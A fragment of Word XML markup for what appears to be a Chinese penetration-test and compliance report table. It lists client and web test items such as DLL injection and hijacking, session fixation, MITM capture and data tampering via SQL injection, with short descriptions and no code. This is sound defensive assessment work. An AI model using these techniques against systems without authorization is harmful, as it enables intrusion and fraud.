              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D1B9BDA">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71901B07">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="947420" cy="545465"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
                  <wp:docPr id="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7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId46"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="947420" cy="545465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76B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1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7112A8AB">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恶意代码防范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73DD8BD9">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a）应采用免受恶意代码攻击的技术措施或主动免疫可信验证机制及时识别入侵和病毒行为，并将其有效阻断</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55FE7C28">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C/S客户端</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E09CC8">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DLL注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154AFB0C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DLL劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79BD5D51">
            <w:pPr>
              <w:jc w:val="left"/>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1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DLL注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788DAE88">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测试过程中，使用进程注入工具对客户端进行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DLL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>注入操作，观察注入后产生的结果。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E6D99EE">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7DB7297B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5438B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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B640210">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46B00B2F">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA9EF26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CEC0950">
            <w:pPr>
              <w:jc w:val="left"/>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1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DLL劫持</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14488649">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攻击者通过一些手段来劫持或者替换正常的DLL，欺骗正常程序加载预先准备好的恶意DLL，而后实现其恶意的目的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D544D33">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66227D95">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FF0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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EB02316">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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="563EDC3B">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a）应采用校验技术或密码技术保证重要数据在传输过程中的完整性，包括但不限于鉴别数据、重要业务数据、重要审计数据、重要配置数据、重要视频数据和重要个人信息等；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="128DA68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5.1会话劫持</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4493AA16">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5.2支付逻辑漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62432C49">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1.会话令牌安全性测试 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="738D09C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·检查会话Cookie是否缺失HttpOnly、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>属性（通过浏览器开发者工具查看）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FAD9168">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·验证会话ID随机性：多次登录生成的新会话ID是否具备强随机性（如长度≥128位）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EAB11FF">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4C0372DB">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005F3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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58385960">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4C99D68">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45A86271">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68CDBC48">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2.中间人攻击（MITM）验证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BD1649">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·使用Wireshark捕获HTTP请求，检查敏感数据（如Token、密码）是否明文传输。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D563B6">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·测试HTTPS是否强制启用且未混合HTTP内容（如HSTS头配置）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AB228BE">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低危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D5AB48B">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64E8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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71684403">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48060FB1">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auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B94C2A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2889A59F">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3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>会话固定攻击检测</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04FC7A35">
            <w:pP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·登录前获取固定Session ID，登录后验证是否仍有效（若有效则存在漏洞）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45423C70">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="320C4408">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4966A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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="071A7224">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C9990A5">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b）应采用校验技术或密码技术保证重要数据在存储过程中的完整性，包括但不限于鉴别数据、重要业务数据、重要审计数据、重要配置数据、重要视频数据和重要个人信息等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A4EBAF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5.3 敏感数据可被篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D822D2F">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1.数据篡改测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE08F75">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·通过SQL注入或未授权API接口直接修改数据库字段（如用户余额、权限等级），验证是否触发完整性校验。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D65F7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·篡改本地存储文件（如JSON配置文件）后重启服务，检查系统是否检测到数据异常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="713AE857">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="481A6F7E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="954405" cy="536575"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="15875"/>
                  <wp:docPr id="1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1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="954405" cy="536575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="01C9C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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B00A537">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2CEDBB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="778F49CF">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C/S客户端</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0F9364">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>程序加壳检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239653A6">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>签名检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5913C57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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>逆向分析/反编译防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CFBFD1">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>客户端程序完整性校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B27435C">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.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>程序加壳检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FE8193">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识别文件查看客户端程序文件的编译器连接器信息。对exe文件进行检查，未发现具有加壳防护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EBDDDA2">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04EC8C29">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A60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 w:hRule="atLeast"/>
        </w:trPr>
